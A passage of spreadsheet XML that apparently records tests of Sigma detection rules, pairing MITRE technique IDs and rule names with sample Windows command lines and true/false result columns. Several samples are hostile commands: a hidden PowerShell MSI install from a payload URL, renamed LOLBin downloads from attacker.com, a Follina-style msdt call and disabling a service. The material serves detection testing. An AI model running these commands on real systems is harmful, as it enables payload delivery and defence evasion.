      </c>
      <c r="B3545" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_symlinkevaluation</t>
        </is>
      </c>
      <c r="C3545" s="43" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation</t>
        </is>
      </c>
      <c r="D3545" s="43" t="inlineStr">
        <is>
          <t>c0b2768a-dd06-4671-8339-b16ca8d1f27f</t>
        </is>
      </c>
      <c r="E3545" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\System\CurrentControlSet\Control\FileSystem" /v "SymlinkRemoteToLocalEvaluation" /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F3545" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3545" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3545" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3545" s="43" t="n"/>
      <c r="J3545" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3545" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3546" ht="15.75" customHeight="1" s="42">
      <c r="A3546" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3546" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3546" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D3546" s="43" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E3546" s="43" t="inlineStr">
        <is>
          <t>ftp -s:script.txt</t>
        </is>
      </c>
      <c r="F3546" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3546" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3546" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3546" s="43" t="n"/>
      <c r="J3546" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3546" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3547" ht="15.75" customHeight="1" s="42">
      <c r="A3547" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3547" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcalua</t>
        </is>
      </c>
      <c r="C3547" s="43" t="inlineStr">
        <is>
          <t>Use of Pcalua For Execution</t>
        </is>
      </c>
      <c r="D3547" s="43" t="inlineStr">
        <is>
          <t>0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2</t>
        </is>
      </c>
      <c r="E3547" s="43" t="inlineStr">
        <is>
          <t>pcalua.exe -a calc.exe</t>
        </is>
      </c>
      <c r="F3547" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3547" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3547" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3547" s="43" t="n"/>
      <c r="J3547" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3547" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3548" ht="15.75" customHeight="1" s="42">
      <c r="A3548" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3548" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C3548" s="43" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D3548" s="43" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E3548" s="43" t="inlineStr">
        <is>
          <t>runscripthelper.exe surfacecheck script.ps1 C:\Windows\Temp</t>
        </is>
      </c>
      <c r="F3548" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3548" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3548" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3548" s="43" t="n"/>
      <c r="J3548" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3548" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3549" ht="15.75" customHeight="1" s="42">
      <c r="A3549" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3549" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C3549" s="43" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D3549" s="43" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E3549" s="43" t="inlineStr">
        <is>
          <t>runscripthelper.exe surfacecheck script.ps1 C:\Windows\Temp\.</t>
        </is>
      </c>
      <c r="F3549" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3549" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3549" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3549" s="43" t="n"/>
      <c r="J3549" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3549" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3550" ht="15.75" customHeight="1" s="42">
      <c r="A3550" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3550" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_php_inline_command_execution</t>
        </is>
      </c>
      <c r="C3550" s="43" t="inlineStr">
        <is>
          <t>Php Inline Command Execution</t>
        </is>
      </c>
      <c r="D3550" s="43" t="inlineStr">
        <is>
          <t>d81871ef-5738-47ab-9797-7a9c90cd4bfb</t>
        </is>
      </c>
      <c r="E3550" s="43" t="inlineStr">
        <is>
          <t>php.exe --run "system('whoami');"</t>
        </is>
      </c>
      <c r="F3550" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3550" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3550" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3550" s="43" t="n"/>
      <c r="J3550" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3550" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3551" ht="15.75" customHeight="1" s="42">
      <c r="A3551" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3551" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C3551" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D3551" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E3551" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service -Name 'Spooler' -StartupType 'Disabled'"</t>
        </is>
      </c>
      <c r="F3551" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3551" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3551" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3551" s="43" t="n"/>
      <c r="J3551" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3551" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3552" ht="15.75" customHeight="1" s="42">
      <c r="A3552" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3552" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C3552" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D3552" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E3552" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service -Name Spooler -StartupType Disabled"</t>
        </is>
      </c>
      <c r="F3552" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3552" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3552" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3552" s="43" t="n"/>
      <c r="J3552" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3552" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3553" ht="15.75" customHeight="1" s="42">
      <c r="A3553" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3553" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C3553" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D3553" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E3553" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service Spooler -StartupType Disabled"</t>
        </is>
      </c>
      <c r="F3553" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3553" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3553" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3553" s="43" t="n"/>
      <c r="J3553" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3553" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3554" ht="15.75" customHeight="1" s="42">
      <c r="A3554" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3554" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_set_service_disabled</t>
        </is>
      </c>
      <c r="C3554" s="43" t="inlineStr">
        <is>
          <t>Service StartupType Change Via PowerShell Set-Service</t>
        </is>
      </c>
      <c r="D3554" s="43" t="inlineStr">
        <is>
          <t>62b20d44-1546-4e61-afce-8e175eb9473c</t>
        </is>
      </c>
      <c r="E3554" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Set-Service -StartupType 'Disabled' -Name Spooler"</t>
        </is>
      </c>
      <c r="F3554" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3554" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3554" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3554" s="43" t="n"/>
      <c r="J3554" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3554" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3555" ht="15.75" customHeight="1" s="42">
      <c r="A3555" s="43" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B3555" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C3555" s="43" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D3555" s="43" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E3555" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\mmc.exe -Embedding</t>
        </is>
      </c>
      <c r="F3555" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3555" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3555" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3555" s="43" t="n"/>
      <c r="J3555" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3555" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3556" ht="15.75" customHeight="1" s="42">
      <c r="A3556" s="43" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B3556" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C3556" s="43" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D3556" s="43" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E3556" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\system32\\mmc.exe" -Embedding</t>
        </is>
      </c>
      <c r="F3556" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3556" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3556" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3556" s="43" t="n"/>
      <c r="J3556" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3556" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3557" ht="15.75" customHeight="1" s="42">
      <c r="A3557" s="43" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B3557" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C3557" s="43" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D3557" s="43" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E3557" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\mmc.exe  -Embedding</t>
        </is>
      </c>
      <c r="F3557" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3557" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3557" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3557" s="43" t="n"/>
      <c r="J3557" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3557" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3558" ht="15.75" customHeight="1" s="42">
      <c r="A3558" s="43" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B3558" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C3558" s="43" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D3558" s="43" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E3558" s="43" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\system32\mmc.exe -Embedding</t>
        </is>
      </c>
      <c r="F3558" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3558" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3558" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3558" s="43" t="n"/>
      <c r="J3558" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3558" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3559" ht="15.75" customHeight="1" s="42">
      <c r="A3559" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B3559" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3559" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3559" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3559" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w hidden -c "$type=[type]::GetTypeFromProgID('WindowsInstaller.Installer'); $inst=[Activator]::CreateInstance($type); $inst.UILevel=2; $inst.InstallProduct('http://example.com/payload.msi', '')"</t>
        </is>
      </c>
      <c r="F3559" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3559" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3559" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3559" s="43" t="n"/>
      <c r="J3559" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3559" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3560" ht="15.75" customHeight="1" s="42">
      <c r="A3560" s="43" t="inlineStr">
        <is>
          <t>t1059.005</t>
        </is>
      </c>
      <c r="B3560" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_dropper</t>
        </is>
      </c>
      <c r="C3560" s="43" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript</t>
        </is>
      </c>
      <c r="D3560" s="43" t="inlineStr">
        <is>
          <t>cea72823-df4d-4567-950c-0b579eaf0846</t>
        </is>
      </c>
      <c r="E3560" s="43" t="inlineStr">
        <is>
          <t>cscript  //E:Jscript C:\\Users\\thaim\\AppData\\Local\\Temp\\OSTapGet.js</t>
        </is>
      </c>
      <c r="F3560" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3560" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3560" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3560" s="43" t="n"/>
      <c r="J3560" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3560" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3561" ht="15.75" customHeight="1" s="42">
      <c r="A3561" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3561" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdl32_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C3561" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Via Cmdl32.EXE</t>
        </is>
      </c>
      <c r="D3561" s="43" t="inlineStr">
        <is>
          <t>f37aba28-a9e6-4045-882c-d5004043b337</t>
        </is>
      </c>
      <c r="E3561" s="43" t="inlineStr">
        <is>
          <t>cmdl32.exe "/vpn" "/lan" C:\path\to\config.txt</t>
        </is>
      </c>
      <c r="F3561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3561" s="43" t="n"/>
      <c r="J3561" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3561" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3562" ht="15.75" customHeight="1" s="42">
      <c r="A3562" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3562" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdl32_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C3562" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Via Cmdl32.EXE</t>
        </is>
      </c>
      <c r="D3562" s="43" t="inlineStr">
        <is>
          <t>f37aba28-a9e6-4045-882c-d5004043b337</t>
        </is>
      </c>
      <c r="E3562" s="43" t="inlineStr">
        <is>
          <t>cmdl32.exe -vpn -lan C:\path\to\config.txt</t>
        </is>
      </c>
      <c r="F3562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3562" s="43" t="n"/>
      <c r="J3562" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3562" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3563" ht="15.75" customHeight="1" s="42">
      <c r="A3563" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3563" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdl32_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C3563" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Via Cmdl32.EXE</t>
        </is>
      </c>
      <c r="D3563" s="43" t="inlineStr">
        <is>
          <t>f37aba28-a9e6-4045-882c-d5004043b337</t>
        </is>
      </c>
      <c r="E3563" s="43" t="inlineStr">
        <is>
          <t>cmdl32.exe /lan /vpn C:\path\to\config.txt</t>
        </is>
      </c>
      <c r="F3563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3563" s="43" t="n"/>
      <c r="J3563" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3563" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3564" ht="15.75" customHeight="1" s="42">
      <c r="A3564" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3564" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdl32_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C3564" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Via Cmdl32.EXE</t>
        </is>
      </c>
      <c r="D3564" s="43" t="inlineStr">
        <is>
          <t>f37aba28-a9e6-4045-882c-d5004043b337</t>
        </is>
      </c>
      <c r="E3564" s="43" t="inlineStr">
        <is>
          <t>copy cmdl32.exe not_an_exploit.exe &amp;&amp; not_an_exploit.exe /vpn /lan C:\path\to\config.txt</t>
        </is>
      </c>
      <c r="F3564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3564" s="43" t="n"/>
      <c r="J3564" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3564" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3565" ht="15.75" customHeight="1" s="42">
      <c r="A3565" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3565" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_zipexec</t>
        </is>
      </c>
      <c r="C3565" s="43" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution</t>
        </is>
      </c>
      <c r="D3565" s="43" t="inlineStr">
        <is>
          <t>90dcf730-1b71-4ae7-9ffc-6fcf62bd0132</t>
        </is>
      </c>
      <c r="E3565" s="43" t="inlineStr">
        <is>
          <t>powershell -ep Bypass -w Hidden -Command {Expand-Archive -Path 'C:\Temp\payload.zip' -DestinationPath 'C:\Temp\extracted' -Force; Start-Process 'binary.exe'}</t>
        </is>
      </c>
      <c r="F3565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3565" s="43" t="n"/>
      <c r="J3565" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3565" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3566" ht="15.75" customHeight="1" s="42">
      <c r="A3566" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3566" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C3566" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D3566" s="43" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E3566" s="43" t="inlineStr">
        <is>
          <t>copy IMEWDBLD.exe not_a_downloader.exe &amp;&amp; not_a_downloader.exe http://attacker.com/payload.exe</t>
        </is>
      </c>
      <c r="F3566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3566" s="43" t="n"/>
      <c r="J3566" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3566" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3567" ht="15.75" customHeight="1" s="42">
      <c r="A3567" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3567" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C3567" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D3567" s="43" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E3567" s="43" t="inlineStr">
        <is>
          <t>imewdbld.exe "h"tt"payload.exe"</t>
        </is>
      </c>
      <c r="F3567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3567" s="43" t="n"/>
      <c r="J3567" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3567" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3568" ht="15.75" customHeight="1" s="42">
      <c r="A3568" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3568" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C3568" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D3568" s="43" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E3568" s="43" t="inlineStr">
        <is>
          <t>imewdbld.exe ftattacker.com/payload.exe</t>
        </is>
      </c>
      <c r="F3568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3568" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3568" s="43" t="n"/>
      <c r="J3568" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3568" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3569" ht="15.75" customHeight="1" s="42">
      <c r="A3569" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3569" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mpiexec</t>
        </is>
      </c>
      <c r="C3569" s="43" t="inlineStr">
        <is>
          <t>MpiExec Lolbin</t>
        </is>
      </c>
      <c r="D3569" s="43" t="inlineStr">
        <is>
          <t>729ce0ea-5d8f-4769-9762-e35de441586d</t>
        </is>
      </c>
      <c r="E3569" s="43" t="inlineStr">
        <is>
          <t>mpiexec.exe -n 1 calc.exe</t>
        </is>
      </c>
      <c r="F3569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3569" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3569" s="43" t="n"/>
      <c r="J3569" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3569" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3570" ht="15.75" customHeight="1" s="42">
      <c r="A3570" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3570" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwrun_follina</t>
        </is>
      </c>
      <c r="C3570" s="43" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina</t>
        </is>
      </c>
      <c r="D3570" s="43" t="inlineStr">
        <is>
          <t>6004abd0-afa4-4557-ba90-49d172e0a299</t>
        </is>
      </c>
      <c r="E3570" s="43" t="inlineStr">
        <is>
          <t>pcwrun.exe msdt.exe /id PCWDiagnostic /skip true /param "IT_BrowseForFile=..\\..\\..\\Windows\\System32\\calc.exe"</t>
        </is>
      </c>
      <c r="F3570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3570" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3570" s="43" t="n"/>
      <c r="J3570" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3570" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3571" ht="15.75" customHeight="1" s="42">
      <c r="A3571" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3571" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_scriptrunner</t>
        </is>
      </c>
      <c r="C3571" s="43" t="inlineStr">
        <is>
          <t>Use of Scriptrunner.exe</t>
        </is>
      </c>
      <c r="D3571" s="43" t="inlineStr">
        <is>
          <t>64760eef-87f7-4ed3-93fd-655668ea9420</t>
        </is>
      </c>
      <c r="E3571" s="43" t="inlineStr">
        <is>
          <t>ScriptRunner.exe -appvscript" calc.exe</t>
        </is>
      </c>
      <c r="F3571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3571" s="43" t="n"/>
      <c r="J3571" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3571" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3572" ht="15.75" customHeight="1" s="42">
      <c r="A3572" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3572" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C3572" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D3572" s="43" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E3572" s="43" t="inlineStr">
        <is>
          <t>PresentationHost.exe "http://192.168.1.50/share/payload.xbap"</t>
        </is>
      </c>
      <c r="F3572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3572" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3572" s="43" t="n"/>
